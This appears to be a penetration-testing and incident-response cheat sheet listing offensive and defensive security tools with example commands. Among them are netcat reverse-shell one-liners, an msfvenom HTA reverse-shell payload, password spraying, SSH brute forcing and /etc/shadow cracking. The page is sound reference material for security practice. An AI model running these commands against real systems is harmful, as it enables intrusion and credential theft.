Unified playbook
Cobalt Strike
Commercial adversary simulation platform with beacon payloads and rich post-exploitation workflows.
Official website: cobaltstrike.com
Sliver C2
Open-source cross-platform command and control framework maintained by Bishop Fox.
Official website: sliver.sh
Empire
PowerShell and Python agent framework for post-exploitation with extensive module support.
Official website: github.com/BC-SECURITY/Empire
Havoc
Modern, configurable C2 platform with operator tooling for red team operations.
Official website: github.com/HavocFramework/Havoc
Nishang
Collection of offensive PowerShell scripts for initial access, privilege escalation, and persistence.
Official website: github.com/samratashok/nishang
CrackMapExec
Swiss-army knife for network exploitation of SMB, RDP, WinRM, LDAP, and more.
Official website: github.com/Porchetta-Industries/CrackMapExec
Responder
LLMNR, NBT-NS, and MDNS poisoner for capturing credentials and relaying authentication.
Official website: github.com/lgandx/Responder
Impacket
Python tooling for crafting and abusing network protocols such as SMB, Kerberos, and RPC.
Official website: github.com/fortra/impacket
Mimikatz
Credential dumping toolkit for extracting passwords, hashes, and Kerberos tickets.
Official website: github.com/gentilkiwi/mimikatz
Evil-WinRM
Interactive WinRM shell for offensive operators targeting Windows environments.
Official website: github.com/Hackplayers/evil-winrm
Rubeus
Kerberos abuse toolkit covering TGT harvesting, ticket requests, and ticket manipulation.
Official website: github.com/GhostPack/Rubeus
BloodHound
Graph-based analysis of Active Directory relationships to find privilege escalation paths.
Official website: github.com/BloodHoundAD/BloodHound
SharpHound
Data collector for BloodHound used to map Active Directory objects and edges.
Official website: github.com/BloodHoundAD/SharpHound
Kerberoasting
Technique to request service tickets (TGS) and crack their hashes offline to recover service credentials.
Reference tool: Impacket GetUserSPNs
Covenant
.NET-based C2 framework supporting HTTP, SMB, and custom listener profiles.
Official website: github.com/cobbr/Covenant
Pupy
Cross-platform post-exploitation remote administration tool with memory-resident payloads.
Official website: github.com/n1nj4sec/pupy
Veil Framework
Payload generation and AV-evasion framework for bypassing signature-based detection.
Official website: github.com/Veil-Framework/Veil
Bettercap
Network reconnaissance, MITM, and protocol manipulation toolkit with automation.
Official website: bettercap.org
BeEF
Browser exploitation framework for targeting web clients via hooked browsers.
Official website: beefproject.com
Social Engineer Toolkit
Collection of pre-built social engineering attacks and payloads by TrustedSec.
Official website: github.com/trustedsec/social-engineer-toolkit
SpoofApp
Caller ID spoofing application used for vishing simulations and social engineering.
Official website: spoofapp.com
SpoofCard
Service for spoofing caller ID, voice changing, and recording during engagements.
Official website: spoofcard.com
Asterisk
Open-source PBX used to build custom vishing labs, IVR testing, and call relays.
Official website: asterisk.org
socat
Versatile relay utility for port forwarding, reverse shells, and encrypted tunnels.
Official website: dest-unreach.org/socat
Proxychains
Tool to force TCP connections through proxy chains (SOCKS/HTTP) for pivoting.
Official website: github.com/haad/proxychains
DNSCat2
Command-and-control over DNS for covert channels and restricted environments.
Official website: github.com/iagox86/dnscat2
TrevorC2
Covert HTTP command and control using legitimate-looking web requests.
Official website: github.com/trustedsec/trevorc2
Twittor
Twitter-based command and control channel using direct messages for tasking.
Official website: github.com/PaulSec/twittor
DropboxC2
C2 framework leveraging Dropbox API as a dead-drop filesystem for payloads and tasks.
Official website: github.com/Arno0x/DropboxC2C
wsc2
WebSocket-based C2 channel for stealthy bidirectional control over HTTP(S).
Official website: github.com/Arno0x/WSC2
WMImplant
WMI-based post-exploitation implant enabling remote command execution via WMI events.
Official website: github.com/FortyNorthSecurity/WMImplant
DNS tunneling
Tunneling technique using DNS queries for data exfiltration (iodine/dnscat2-style).
Reference: iodine on Kali
NTP tunneling
Covert channel embedding data in NTP traffic to bypass egress controls.
Reference: NTP tunneling research
RDP
Microsoft Remote Desktop Protocol for graphical remote access to Windows systems.
Official website: RDP client docs
Apple Remote Desktop
macOS remote management service for administering and viewing Apple endpoints.
Official website: support.apple.com/remote-desktop
VNC
Platform-agnostic remote desktop protocol using RFB for screen sharing and control.
Official website: realvnc.com
X server forwarding
SSH X11 forwarding to run remote GUI applications locally through encrypted channels.
Official website: ssh.com/academy/ssh/x11-forwarding
Wireshark
GUI packet analyzer for deep inspection of hundreds of network protocols.
Official website: wireshark.org
Zeek (Bro)
Network security monitoring framework producing rich protocol logs for detection.
Official website: zeek.org
Suricata
Open-source intrusion detection and prevention engine with high-performance packet capture.
Official website: suricata.io
Security Onion
Linux distribution for network security monitoring, log management, and threat hunting.
Official website: securityonion.net
OSQuery
Endpoint telemetry framework exposing system state via SQL-like queries.
Official website: osquery.io
GRR Rapid Response
Remote live forensics platform for incident responders to collect and analyze artifacts.
Official website: github.com/google/grr
Cuckoo Sandbox
Automated malware analysis system supporting Windows, Linux, macOS, and Android samples.
Official website: cuckoosandbox.org
Logstash
Elastic stack data pipeline for ingesting and transforming event logs.
Official website: elastic.co/logstash
Kibana
Visualization and dashboard layer for Elasticsearch data and threat hunting.
Official website: elastic.co/kibana
Elasticsearch
Distributed search and analytics engine powering log indexing and SIEM pipelines.
Official website: elastic.co/elasticsearch
Wazuh
Open-source SIEM and XDR platform built on OSSEC with centralized policy management.
Official website: wazuh.com
Graylog
Centralized log management and analytics platform with alerting and dashboards.
Official website: graylog.org
MISP
Threat intelligence sharing platform for managing IOCs and correlation rules.
Official website: misp-project.org
YARA
Pattern matching engine used to create signatures for malware and file triage.
Official website: virustotal.github.io/yara
Sigma
Generic SIEM detection rule format with community-driven analytics.
Official website: github.com/SigmaHQ/sigma
Atomic Red Team
Collection of atomic tests mapped to MITRE ATT&CK for validating detections.
Official website: github.com/redcanaryco/atomic-red-team
Invoke-AtomicRedTeam
PowerShell harness to execute Atomic Red Team tests quickly on Windows endpoints.
Official website: github.com/redcanaryco/invoke-atomicredteam
CALDERA
MITRE's automated adversary emulation platform with pluggable agents and operations.
Official website: caldera.mitre.org
Prelude Operator
Continuous validation platform automating ATT&CK-aligned adversary behaviors.
Official website: prelude.org/product/operator
Red Canary Simulator
Scenario-driven emulation playbooks for testing detection coverage.
Official website: github.com/redcanaryco/red-team-simulator
AttackIQ
Continuous security validation platform delivering automated attack scenarios.
Official website: attackiq.com
Infection Monkey
Self-propagating attack simulator for testing lateral movement and segmentation.
Official website: github.com/guardicore/monkey
PurpleSharp
.NET adversary emulation tool executing encoded ATT&CK techniques in Active Directory.
Official website: github.com/mvelazc0/PurpleSharp
MITRE ATT&CK Navigator
Visualization tool for ATT&CK matrices to plan coverage and share heatmaps.
Official website: mitre-attack.github.io/attack-navigator
MITRE Engage
Framework for planning and evaluating active defense and adversary engagement strategies.
Official website: engage.mitre.org
Maltego
Graph analytics platform for link analysis, OSINT enrichment, and investigations.
Official website: maltego.com
Recon-ng
Modular web reconnaissance framework with workspace and data store support.
Official website: github.com/lanmaster53/recon-ng
theHarvester
Email, subdomain, and host harvesting tool pulling data from public sources.
Official website: github.com/laramies/theHarvester
SpiderFoot
Automated OSINT collection with more than 200 modules for infrastructure discovery.
Official website: github.com/smicallef/spiderfoot
Shodan
Search engine indexing internet-connected systems and services for exposure analysis.
Official website: shodan.io
Censys
Internet-wide scanning platform offering structured host and certificate data.
Official website: censys.io
Amass
Subnet and DNS enumeration toolkit for mapping external attack surfaces.
Official website: github.com/owasp-amass/amass
Sublist3r
Fast subdomain enumeration utility leveraging multiple data sources.
Official website: github.com/aboul3la/Sublist3r
Assetfinder
Command-line asset discovery tool aggregating subdomains and external identifiers.
Official website: github.com/tomnomnom/assetfinder
Aquatone
Aggregates screenshots and headers of discovered subdomains for visual reconnaissance.
Official website: github.com/michenriksen/aquatone
DNSRecon
DNS enumeration toolkit covering brute force, zone transfers, cache snooping, and record collection.
Install (Linux)
sudo apt update && sudo apt install dnsrecon -y
Common commands
dnsrecon -d {{target}}
dnsrecon -d {{target}} -t axfr
Official website: github.com/darkoperator/dnsrecon
dig
DNS query utility for record lookups, custom resolvers, and diagnostics.
Install (Linux)
sudo apt update && sudo apt install dnsutils -y
Common commands
dig {{target}} any
dig {{target}} A +short
Official website: bind.isc.org
whois
WHOIS client for querying domain and registration records from registrars.
Install (Linux)
sudo apt update && sudo apt install whois -y
Common commands
whois {{target}}
whois -h whois.arin.net {{target}}
Official website: iana.org/whois
host
Simple DNS lookup utility for querying records, PTR lookups, and zone testing.
Install (Linux)
sudo apt update && sudo apt install bind9-host -y
Common commands
host {{target}}
host -t txt {{target}}
Official website: bind.isc.org
crt.sh
Certificate Transparency search to uncover issued TLS certificates and hidden subdomains.
API query
curl -s "https://crt.sh/?q={{target}}&output=json"
Export domains only
curl -s "https://crt.sh/?q={{target}}&output=json" | jq -r '.[].name_value' | sort -u
Official website: crt.sh
Wayback Machine
Archive search to recover historical URLs and parameters for target domains.
Fetch archived URLs
curl "https://web.archive.org/cdx/search/cdx?url={{target}}/*&output=text"
Filter for paths
curl "https://web.archive.org/cdx/search/cdx?url={{target}}/*&output=text&fl=original&filter=statuscode:200"
Official website: web.archive.org
Google Hacking Database
Curated Google dorks to uncover exposed admin panels, backups, and sensitive files.
Example dorks
site:{{target}} inurl:admin
site:{{target}} filetype:bak OR filetype:sql
Official website: exploit-db.com/google-hacking-database
h8mail
Credential breach hunting tool supporting local breach corpora and online APIs.
Install (Linux)
pip3 install --user h8mail
Common commands
h8mail -t {{target}}
h8mail -t {{target}} -bc ./breaches.txt -k "API_KEY"
Official website: github.com/khast3x/h8mail
WhatBreach
Python utility to check email addresses against public breach datasets.
Install (Linux)
pip3 install --user whatbreach
Common commands
whatbreach -t {{target}}
Official website: github.com/Ekultek/WhatBreach
LeakLooker
Open database hunter that scans for exposed Elasticsearch, MongoDB, and CouchDB instances.
Run
python3 leaklooker.py --help
Targeted search
python3 leaklooker.py --keyword {{target}} --limit 50
Official website: github.com/woj-ciech/LeakLooker
Scavenger
Leak discovery script that hunts for exposed credentials in GitHub, Pastebin, and common dumps.
Run
python3 scavenger.py --help
Common commands
python3 scavenger.py -d {{target}} -o findings.txt
Official website: github.com/rndinfosecguy/Scavenger
PwnDB
CLI wrapper for querying breach aggregation services for compromised credentials.
Run
python3 pwndb.py --help
Common commands
python3 pwndb.py --target {{target}}
Official website: github.com/davidtavarez/pwndb
exiftool
Metadata parser for images, documents, and binaries to extract creator and location details.
Install (Linux)
sudo apt update && sudo apt install libimage-exiftool-perl -y
Common commands
exiftool {{file}}
exiftool -gps* {{file}}
Official website: exiftool.org
FOCA
Metadata analysis suite for harvesting hidden information from public documents.
Usage
FOCA.exe
Automated scan
Search domain & download docs → metadata report
Official website: elevenpaths.com/labstools/foca
metagoofil
Metadata harvester that downloads public docs and extracts usernames, paths, and tech.
Install (Linux)
pip3 install --user metagoofil
Common commands
metagoofil -d {{target}} -t pdf,doc -n 25 -o loot
metagoofil -d {{target}} -t xls,ppt -n 50 -o findings
Official website: github.com/laramies/metagoofil
enum4linux
SMB enumeration script for users, shares, policies, and RID cycling.
Install (Linux)
sudo apt update && sudo apt install enum4linux -y
Common commands
enum4linux -a {{target}}
enum4linux -u guest -p '' -S {{target}}
Official website: github.com/CiscoCXSecurity/enum4linux
Burp Suite
Integrated platform for web application security testing with intercepting proxy.
Official website: portswigger.net/burp
OWASP ZAP
Open-source web vulnerability scanner with automated and manual testing modes.
Official website: zaproxy.org
DirBuster
Classic directory brute-forcing tool for enumerating hidden web paths.
Official website: sourceforge.net/projects/dirbuster
DirSearch
Command-line directory brute forcer supporting recursion, extensions, and filters.
Official website: github.com/maurosoria/dirsearch
Nikto
Web server vulnerability scanner detecting outdated software and misconfigurations.
Official website: cirt.net/Nikto2
wfuzz
Flexible web fuzzing tool for discovery of parameters, endpoints, and vulnerabilities.
Official website: github.com/xmendez/wfuzz
Commix
Automated command injection exploitation tool for web applications.
Official website: github.com/commixproject/commix
XSStrike
XSS discovery and exploitation suite with intelligent payload generation.
Official website: github.com/s0md3v/XSStrike
w3af
Web application attack and audit framework with extensible plugin system.
Official website: github.com/andresriancho/w3af
Wapiti
Black-box web vulnerability scanner with support for authenticated scans.
Official website: github.com/wapiti-scanner/wapiti
Brakeman
Static analysis security scanner for Ruby on Rails applications.
Official website: brakemanscanner.org
Scout Suite
Multi-cloud security auditing tool for AWS, Azure, and GCP configurations.
Official website: github.com/nccgroup/ScoutSuite
CloudBrute
Fast cloud asset discovery tool for AWS, Azure, and GCP subdomains and buckets.
Official website: github.com/0xsha/CloudBrute
Pacu
Modular AWS exploitation framework for post-exploitation and privilege escalation.
Official website: github.com/RhinoSecurityLabs/pacu
Cloud Custodian
Policy-as-code engine to enforce governance and remediation across cloud providers.
Official website: cloudcustodian.io
Masscan
Extremely fast TCP port scanner capable of sweeping the internet.
Official website: github.com/robertdavidgraham/masscan
Angry IP Scanner
Cross-platform IP and port scanner for quick network discovery.
Official website: angryip.org
Hping3
Packet crafting tool for firewall testing, port scanning, and network research.
Official website: github.com/antirez/hping
Scapy
Interactive Python packet manipulation library for sniffing, crafting, and fuzzing.
Official website: scapy.net
Tcpdump
Command-line packet capture utility leveraging libpcap for in-depth analysis.
Official website: tcpdump.org
Ettercap
Comprehensive suite for man-in-the-middle attacks on LAN with sniffing and injection.
Official website: ettercap-project.org
Dsniff
Collection of tools for network auditing, sniffing, and credential harvesting.
Official website: monkey.org/~dugsong/dsniff
Yersinia
Layer 2 attack framework including rogue DHCP server, STP attacks, and ARP manipulation.
Official website: github.com/tomac/yersinia
Zenmap
GUI for Nmap enabling profile-based host and service scanning.
Official website: nmap.org/zenmap
Nessus
Enterprise vulnerability scanner with rich plugin ecosystem and compliance checks.
Official website: tenable.com/products/nessus
Nexpose / InsightVM
Vulnerability management platform from Rapid7 for authenticated and agent-based scans.
Official website: rapid7.com/products/insightvm
Qualys Vulnerability Management
Cloud-based vulnerability scanning and compliance assessment platform.
Official website: qualys.com/products/vulnerability-management
OpenSCAP scanners
Security content automation protocol toolkit for compliance checks and remediation guides.
Official website: open-scap.org
Hashcat
GPU-accelerated password cracking framework supporting hundreds of hash modes.
Official website: hashcat.net/hashcat
Medusa
Threaded login brute-force tool supporting numerous network services.
Official website: github.com/jmk-foofus/medusa
Cewl
Custom wordlist generator that scrapes target websites for candidate terms.
Official website: github.com/digininja/CeWL
Crunch
Wordlist generation utility for creating permutations with custom character sets.
Official website: sourceforge.net/projects/crunch-wordlist
SecLists
Comprehensive collection of wordlists for discovery, fuzzing, and brute force attacks.
Official website: github.com/danielmiessler/SecLists
Hash-identifier
Utility for identifying hash algorithms from captured hash strings.
Official website: github.com/blackploit/hash-identifier
RainbowCrack
Rainbow table-based password cracking suite for reversing hash digests.
Official website: project-rainbowcrack.com
LaZagne
Credential recovery tool extracting stored passwords from common applications.
Official website: github.com/AlessandroZ/LaZagne
Aircrack-ng
Suite for auditing Wi-Fi networks with capture, cracking, and replay utilities.
Official website: aircrack-ng.org
Kismet
Wireless network detector, sniffer, and IDS supporting Wi-Fi, Bluetooth, and more.
Official website: kismetwireless.net
Reaver
WPS brute-forcing tool targeting Wi-Fi routers to recover WPA/WPA2 passphrases.
Official website: github.com/t6x/reaver-wps-fork-t6x
Wifite2
Automated wireless attack tool chaining capture, cracking, and credential workflows.
Official website: github.com/derv82/wifite2
Airmon-ng
Aircrack-ng utility to enable monitor mode and prepare interfaces for Wi-Fi attacks.
Official website: aircrack-ng.org
hostapd (rogue AP)
Access point service used to build rogue APs for wireless credential capture.
Official website: w1.fi/hostapd
EAPHammer
Toolkit for targeted evil twin attacks against WPA2-Enterprise networks.
Official website: github.com/s0lst1c3/eaphammer
mdk4
Wireless testing tool for deauthentication, beacon flooding, and WIDS/WIPS stress.
Official website: github.com/aircrack-ng/mdk4
Spooftooph
Bluetooth spoofing utility to change device name, class, and MAC for social engineering.
Official website: github.com/ktoday/bluez-utils
Fern WiFi Cracker
GUI wireless security auditing tool for WEP/WPA/WPA2 cracking and session hijacking.
Official website: github.com/savio-code/fern-wifi-cracker
WiGLE
Global wireless network map for discovering SSIDs, BSSIDs, and geolocation intel.
Official website: wigle.net
Bettercap (Wi-Fi mode)
Wireless attack modules for Bettercap enabling rogue APs and client spoofing.
Official website: bettercap.org
WiFi Pumpkin
Rogue access point framework for wireless phishing and credential harvesting.
Official website: github.com/P0cL4bs/WiFi-Pumpkin
Bluetooth Honeypot
Decoy Bluetooth services for detecting malicious pairing attempts and scans.
Official website: github.com/andresriancho/bluetooth-low-energy-honeypot
ZigDiggity
Toolkit for auditing Zigbee wireless networks and discovering insecure configurations.
Official website: github.com/riverloopsec/zigdiggity
rfcat
Python toolkit for interacting with CC1111 RF transceivers for wireless hacking.
Official website: github.com/atlas0fd00m/rfcat
HackRF / SDR# tools
Software-defined radio toolkit combining HackRF hardware with SDR# analysis software.
Official website: greatscottgadgets.com/hackrf
The Sleuth Kit
Command-line digital forensics suite for analyzing disk images and file systems.
Official website: sleuthkit.org/sleuthkit
OpenStego
Steganography tool for embedding data into images with optional encryption.
Official website: openstego.com
snow
Whitespace steganography utility hiding messages inside ASCII text.
Official website: darkside.com.au/snow
Coagula
Image-to-sound converter often used for audio-based steganography experiments.
Official website: hempassions.net/coagula
Sonic Visualiser
Audio analysis workstation useful for inspecting spectrogram steganography.
Official website: sonicvisualiser.org
TinEye
Reverse image search engine to find reused images, leaks, and related assets.
Official website: tineye.com
GDB
GNU Debugger for inspecting and controlling program execution on Linux and Unix.
Official website: gnu.org/software/gdb
Windows Debugger (WinDbg)
Microsoft debugger for user-mode and kernel debugging on Windows systems.
Official website: WinDbg documentation
OllyDbg
User-mode debugger for analyzing Windows binaries and malware unpacking.
Official website: ollydbg.de
Ghidra
NSA open-source reverse engineering suite with decompiler and collaborative workflows.
Official website: ghidra-sre.org
Objdump
Binutils tool for disassembling binaries and inspecting object file headers.
Official website: gnu.org/software/binutils
ADIA
Automated Digital Investigator Assistant for streamlining forensic triage.
Official website: github.com/BC-SECURITY/ADIA
CAINE
Linux distribution with a curated suite of digital forensics and incident response tools.
Official website: caine-live.net
Skadi
Forensic triage platform for endpoint evidence collection and malware hunting.
Official website: github.com/orlikoski/Skadi
PALADIN
Bootable forensic OS providing write-blocked acquisition and analysis utilities.
Official website: sumuri.com/product/paladin
SIFT Workstation
Incident response and forensic analysis Linux distribution maintained by SANS.
Official website: digital-forensics.sans.org/community/downloads
Linux Filesystem & Permissions
List directory contents with details
ls -al
Change to a specific directory
cd {{path}}
Display the current working directory
pwd
Create a new directory
mkdir {{directory}}
Remove an empty directory
rmdir {{directory}}
Create an empty file or update its timestamp
touch {{file}}
Copy a file to a new location
cp {{source}} {{destination}}
Recursively copy a directory
cp -r {{source_dir}} {{destination_dir}}
Move or rename files and directories
mv {{source}} {{destination}}
Delete a file
rm {{file}}
Force-delete a directory tree
rm -rf {{path}}
Set executable permissions (u+rwx, g+rx, o+rx)
chmod 755 {{file}}
Change file ownership
chown {{user}}:{{group}} {{path}}
Create a compressed tar archive
tar -czf {{archive}} {{directory}}
Extract a compressed tar archive
tar -xzf {{archive}}
Linux File Viewing & Search
Print file contents to the terminal
cat {{file}}
Page through a file interactively
less {{file}}
Show the first lines of a file
head -n 20 {{file}}
Follow appended lines in real time
tail -f {{file}}
Search a file for a case-insensitive match
grep -i '{{pattern}}' {{file}}
Recursively search files for a match
grep -R '{{pattern}}' {{directory}}
Find files by name in a path
find {{path}} -name '{{pattern}}'
Locate files using the system index
locate {{keyword}}
Show the full path to a command
which {{command}}
Open the manual page for a command
man {{command}}
Search man page descriptions by keyword
apropos {{keyword}}
Linux System Monitoring & Control
Report filesystem disk usage
df -h
Summarize directory sizes in the current path
du -sh *
Display system memory usage
free -h
Monitor real-time process activity
top
List top CPU-consuming processes
ps aux --sort=-%cpu | head
Terminate a process by PID
kill -9 {{pid}}
Terminate all processes matching a name
killall {{process}}
View recent shell history
history | tail
Display kernel and system information
uname -a
Linux Package & Service Management
Run a command with elevated privileges
sudo {{command}}
Refresh package repository indexes
apt update
Install available package upgrades
apt upgrade
Install a package from the repositories
apt install {{package}}
Check legacy service status
service {{service}} status
Restart a systemd service
systemctl restart {{service}}
Review recent system logs for errors
journalctl -xe
Linux Networking & Remote Access
Display network interfaces and addresses
ip addr show
Show the routing table
ip route
Send ICMP echo requests to verify reachability
ping -c 4 {{host}}
Trace the network path to a host
traceroute {{host}}
Fetch only HTTP headers for a URL
curl -I {{url}}
Download a file over HTTP or HTTPS
wget {{url}}
Securely copy a file to a remote host
scp {{file}} {{user}}@{{host}}:{{destination}}
Open a secure shell session
ssh {{user}}@{{host}}
Metasploit Framework Console (msfconsole)
Installation:
sudo apt update && sudo apt install metasploit-framework -y
Configuration:
Set the local IP address globally (for every module)
setg LHOST {{local}}
Set the target IP address globally (for every module)
setg RHOST {{target}}
Set the local port globally (for every module)
setg LPORT {{port}}
Help and show:
Display the options of a module
show options
Display advanced options of a module
show advanced
Display available payloads
show payloads
Show available commands
help
Show available sessions
sessions -l
Show credentials found so far
creds
Database commands:
Starting postgresql db
sudo systemctl start postgresql
Starting postgresql at boot
sudo systemctl enable postgresql
Creating the Metasploit db
sudo msfdb init
Common commands:
Search for modules including that keyword or CVE number
search "keyword"
Run a module
run
Interact with a session
sessions -i "session_number"
Go back to the previously used module
previous
NetCat
Installation:
sudo apt update && sudo apt install netcat-openbsd -y
Start listener:
nc -lnvp {{port}}
Run on target linux system to get a reverse shell
nc -e /bin/bash {{local}} {{port}}
Run on target windows system to get a reverse shell
nc -e cmd.exe {{local}} {{port}}
NetExec
Installation:
sudo apt update && sudo apt install netexec -y
List protocol modules (e.g., SMB modules):
nxc smb -L
Spray a password list across a user list:
nxc smb {{target}} -u /path/to/users.txt -p /path/to/passwords.txt --continue-on-success
SMBClient
Installation:
sudo apt update && sudo apt install smbclient cifs-utils -y
Anonymous session to a share (-N = no password)
smbclient //{{target}}/{{share}} -N
List available shares as an authenticated user
smbclient -L //{{target}} -U "user"
OpenVAS
Installation:
sudo apt update && sudo apt install gvm -y
sudo gvm-setup
Start the OpenVAS vulnerability scanner.
sudo gvm-start
WPscan
Installation:
sudo apt update && sudo apt install wpscan -y
Scan a WordPress site.
wpscan --url "url"
Nikto
Installation:
sudo apt update && sudo apt install nikto -y
Scan a website for common vulnerabilities.
nikto -h "url"
searchsploit
Search Exploit-DB for exploits.
searchsploit "keyword"
Inspect an exploit module
searchsploit -x "module"
Mirror (copy) the module into the current directory.
searchsploit -m "module"
Kali Linux - Paths
Directory with various webshells
Directory with various useful Windows binaries
SMBMAP
Installation:
sudo apt update && sudo apt install smbmap -y
Enumerate SMB shares and their permissions on a Windows system.
smbmap -H {{target}}
Official website: github.com/ShawnDEvans/smbmap
Logs & Auth Artifacts (Most Useful / paths)
Core log files to pivot quickly on host activity, authentication, and session history.
Debian/Ubuntu — system-wide events.
RHEL/CentOS — system-wide events.
Debian/Ubuntu — authentication (SSH, sudo, PAM).
RHEL/CentOS — authentication (SSH, sudo, PAM).
Last login per account — detect first-time or dormant users returning.
Login history — session timeline and remote origins.
Failed logins — brute-force and password-guessing attempts.
Time & System Context
Stamp investigation start/end for correlation.
date
Confirm timezone, NTP state, and clock drift.
timedatectl
Kernel, arch, and OS build — needed for tooling/IOC compatibility.
uname -a
Users & Logins
Who is currently logged in (TTY/pts, host, time).
who
Last login per account — flags first-time or long-dormant users.
lastlog
Processes & Services
Snapshot of processes — owner, CPU/mem, full cmdline.
ps aux
Live view — spot spikes from miners or rogue jobs.
top
Scheduled tasks — common persistence locations.
cat /etc/crontab
Per-user cron — stealthy persistence.
Networking (Quick Wins)
Interfaces summary (IP/MAC/up-down) — sets network context.
ip -br a
Listening sockets with owning PIDs — modern & fast.
ss -tulnp
Processes with open network connections — ties traffic to executables.
lsof -i
Filesystem & Mounts
Mounted filesystems and options — spot unusual writeable mounts.
mount
Recently changed files — quick leads for the last 24h.
find / -mtime -1 2>/dev/null
Nmap
Installation:
sudo apt update && sudo apt install nmap -y
Host enumeration (ping sweep, no port scan).
nmap -sn {{target}}
Detect service versions and the operating system.
nmap -sV -O {{target}}
Brute-force an FTP login with an Nmap script.
Replace usernames.txt and passwords.txt with your own files.
nmap --script ftp-brute --script-args userdb=usernames.txt,passdb=passwords.txt {{target}}
Scan a Windows host for known SMB vulnerabilities with Nmap.
nmap --script smb-vuln* {{target}}
To save the scan to a file, add the -oN option followed by the output file name.
Official website: nmap.org
John the Ripper
Installation:
sudo apt update && sudo apt install john -y
Use rockyou wordlist to brute-force Linux /etc/shadow hashes
john --wordlist=/usr/share/wordlists/rockyou.txt /etc/shadow
Official website: openwall.com/john
Hydra
Installation:
sudo apt update && sudo apt install hydra -y
Attempt SSH logins using users.txt and pass.txt
Replace ssh with ftp to target an FTP service instead
hydra -L users.txt -P pass.txt {{target}} ssh
Official website: github.com/vanhauser-thc/thc-hydra
Gobuster
Installation:
sudo apt update && sudo apt install gobuster -y
Discover hidden directories on a web server with a wordlist
gobuster dir -u https://{{target}} -w /usr/share/wordlists/raft-large-directories.txt
Official website: github.com/OJ/gobuster
ffuf
Installation:
sudo apt update && sudo apt install ffuf -y
Fuzz URL paths or parameters to find hidden endpoints
ffuf -u https://{{target}}/FUZZ -w /usr/share/wordlists/raft-large-words.txt -t 100
Official website: github.com/ffuf/ffuf
dCode: Caesar Cipher Online Encoder/Decoder
What it does:
– Sends your plaintext “HELLO” with a shift of 3 to dCode
– Returns the encoded result “KHOOR”
Official website: dcode.fr/caesar-cipher
CyberChef: Web-Based Data “Recipe” Tool
Browser-based tool for on-the-fly encoding, decoding, encryption, hashing, and data analysis via a drag-and-drop “recipe” interface.
Official website: gchq.github.io/CyberChef
SheetCheat for Forensics (Linux)
This is originally from a TryHackMe room and you can find it here.
Download the PDF from: SheetCheat
SheetCheat for Forensics (Windows)
This is originally from a TryHackMe room and you can find it here.
Download the PDF from: SheetCheat
Upgrade Reverse Shell to Full PTY
Spawn an interactive Bash shell with proper TTY support using python3
python3 -c 'import pty; pty.spawn("/bin/bash")'
Eric Zimmerman's tools: (Windows)
Eric Zimmerman is a security researcher who has written a number of tools to help perform forensic analysis on the Windows platform. These tools assist with registry, file system, timeline, and many other analyses.
Download it here.
KAPE: (Windows)
Kroll Artifact Parser and Extractor (KAPE) is another beneficial tool by Eric Zimmerman. This tool automates the collection and parsing of forensic artifacts and can help create a timeline of events.
Download it here.
Autopsy: (Windows, Linux, macOS)
Autopsy is an open-source forensics platform that helps analyze data from digital media like mobile devices, hard drives, and removable drives. Various plugins for autopsy speed up the forensic process and extract and present valuable information from the raw data sources.
Download it here.
Volatility: (Windows, Linux, macOS)
Volatility is a tool that helps perform memory analysis on memory captures from both Windows and Linux operating systems. It is a powerful tool that can help extract valuable information from the memory of a machine under investigation.
Download it here.
Redline: (Windows)
Redline is an incident response tool developed and freely distributed by FireEye. This tool can gather forensic data from a system and help analyze the collected forensic information.
Download it here.
Velociraptor: (Windows, Linux, macOS)
Velociraptor is an advanced endpoint-monitoring, forensics, and response platform. It is open-source and very powerful.
Download it here.
SSH: Interactive Shell & SOCKS Proxy
Default port 22
Remote shell session over SSH
ssh user@{{target}}
FTP: Connect & List Directory
Default port 21
FTP session (anonymous)
ftp {{target}}
DNS: Query A Record
Default port 53 (UDP/TCP)
Retrieve the DNS A record for a domain (+short prints only the answer)
dig {{target}} A +short
Simple lookup via nslookup (port 53)
nslookup {{target}}
pentestmonkey/php-reverse-shell
Link for the script:
Official GitHub: github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
HTA Reverse shell
This makes msfvenom create a .hta payload (PowerShell-based HTA format):
msfvenom -p windows/x64/shell_reverse_tcp LHOST={{local}} LPORT={{port}} -f hta-psh -o shell.hta
Host a Python HTTP server in the current directory.
Commands to create a local server:
Access the server from the target machine:
sudo information
Find the commands that can be executed with sudo:
Get information about the permissions of the current user:
File locations of interest
Logs on the computer
GTFOBins
Reference listing different ways to achieve privilege escalation through common binaries
Official website: gtfobins.github.io
SQLMap Quick Commands (CTFs)
Basic scan (no WAF):
With basic filter/WAF bypass:
Sysmon Quick Deploy
Download and extract Sysmon (PowerShell)
Invoke-WebRequest -Uri https://download.sysinternals.com/files/Sysmon.zip -OutFile Sysmon.zip; Expand-Archive Sysmon.zip -DestinationPath Sysmon -Force
Fetch SwiftOnSecurity baseline configuration
Invoke-WebRequest -Uri https://raw.githubusercontent.com/SwiftOnSecurity/sysmon-config/master/sysmonconfig-export.xml -OutFile sysmonconfig-export.xml
Install Sysmon with network and process telemetry (the binary was extracted into the Sysmon directory above)
.\Sysmon\Sysmon64.exe -accepteula -i sysmonconfig-export.xml
Zeek Connection Log Summary
Top talkers (originating hosts) from Zeek conn.log; conn.log is tab-separated, so use zeek-cut to select the id.orig_h field rather than cutting on spaces
zeek-cut id.orig_h < /opt/zeek/logs/current/conn.log | sort | uniq -c | sort -nr | head
Find unusual services by responder port (uid is left out so that uniq -c aggregates connections per port/service pair)
zeek-cut id.resp_p service < /opt/zeek/logs/current/conn.log | sort | uniq -c | sort -nr | head -20
Splunk Suspicious Logon Hunt
Detect repeated logon failures (4625) followed by a success (4624) within a 5-minute window for the same host and account
index=wineventlog sourcetype="WinEventLog:Security" (EventCode=4625 OR EventCode=4624) | transaction host, Account_Name maxspan=5m | search eventcount>=11 EventCode=4624
List affected accounts with their most recent successful logon
index=wineventlog sourcetype="WinEventLog:Security" EventCode=4624 | stats latest(_time) as last_success by Account_Name, host | convert ctime(last_success)